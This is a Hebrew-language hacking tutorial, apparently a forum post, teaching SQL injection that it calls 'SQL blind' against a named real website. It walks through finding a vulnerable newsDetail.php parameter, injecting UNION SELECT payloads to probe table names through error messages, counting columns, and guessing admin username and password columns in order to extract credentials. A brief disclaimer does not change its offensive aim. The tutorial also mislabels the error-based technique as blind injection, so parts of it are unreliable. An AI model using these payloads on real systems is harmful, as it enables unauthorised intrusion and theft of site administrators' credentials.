שלום לכולם היום נילמד שיטת הזרקה חדשה מפעם שעברה לשיטה קוראים.: sql blind
קודם כל מזה sql blind???
sql blind זה זריקה עיוורת היא שונה מי sql injection זריקה עיוורת שהמערכת לא תדע שאנחנו מזריקים
טוב עכשיו שאחנו יודעים מזה sql blind נילמד איך מזריקים..
אוקי כמו שאמרתי המדריך הוא רק לאבטחת מידע נזק לא על אחריותי!!
כמו במדריך הקודם אנחנו נזריק על האתר www.evt-me.com
שלבים:
שלב א.
מציאת דף פריץ באתר ראו דף פריץ:
http://www.evt-me.com/newsDetail.php?id=-8
שלב ב.
אחרי שמצאנו דף פריץ אנחנו נזריק הזרקה עיוורת.. על ידי הפקודה +union+select+0+from+user
פקודה זאת אומרת האים הטבלה user קיימת זה אמור להיראות כך:
http://www.evt-me.com/newsDetail.php...ct+0+from+user
וכמו שאתם רואים זה מחזיר שגיאה:
Table 'evt_evt.user' doesn't existזה אומר שהטבלה לא קיימת אז מה עושים ממשיכים לנחש שמות טבלאות- נגיד עכשיו ננסה ליבדוק אים הטבלה login קיימת בוא ניבדוק את זה.. פשוט משנים בפקודה בימקום user ל login ואז ניראה מזה אומר:
The used SELECT statements have a different number of columns
כמו שזה ניראה זה אומר שהטבלה קיימת אים מישהו לא הבין איך זה אמור להיראות אז ככה:
http://www.evt-me.com/newsDetail.php...t+0+from+login
עכשיו מה שאנחנו צריכים לעשות כמו בunion אנחנו צריכים לדעת באיזה מיספר אנחנו נזריק שיאלתות שיתנו לנו תיוזר ותסיסמה פשוט ממשיכים מה 0 עד למתי שזה מראה תמיספר..
אני הגעתי עד ל6 אים לא הבנתם ראו דוגמא:
http://www.evt-me.com/newsDetail.php...5,6+from+login
ומה זה הראה לנו??? את המיספר 1 ובוא נזריק תשיאלתות.. עכשיו אנחנו ננחש תעמודות...
בדרך כלל העמודות של הטבלה של האדמין הם כאלה:
admin_name
pass
password
admin_pass
admin_password
user
user_name
user_password
username
עכשיו ננסה לנחש תעמודות.. אני מצאתי שיש תעמודה username:
http://www.evt-me.com/newsDetail.php...5,6+from+login
ויש תעמודה pass:
http://www.evt-me.com/newsDetail.php...5,6+from+login
עכשיו למדתם איך להזריק זריקה עיוורת..-sql blind
אני מקווה שלמדתם משהו היום..
קרדיט ל...לי^^







